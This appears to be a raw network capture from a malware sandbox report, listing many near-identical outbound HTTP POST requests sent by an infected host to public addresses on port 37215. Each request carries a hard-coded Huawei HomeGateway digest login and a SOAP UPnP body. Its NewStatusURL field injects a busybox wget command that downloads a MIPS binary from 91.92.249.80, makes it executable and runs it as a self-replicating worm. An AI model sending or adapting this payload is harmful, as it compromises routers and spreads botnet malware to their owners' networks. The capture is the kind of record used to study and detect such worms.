                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          825192.168.2.2347260106.246.53.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240500927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          826192.168.2.2336450197.165.150.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240541935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          827192.168.2.233716842.181.177.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240591049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          828192.168.2.2349488197.165.192.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240621090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          829192.168.2.235204441.252.99.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.240659952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          830192.168.2.2343440157.213.92.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241625071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          831192.168.2.2341184157.112.232.23337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241736889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          832192.168.2.2359314197.217.165.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241863966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          833192.168.2.2353646197.162.223.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241900921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          834192.168.2.2333280199.175.203.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241939068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
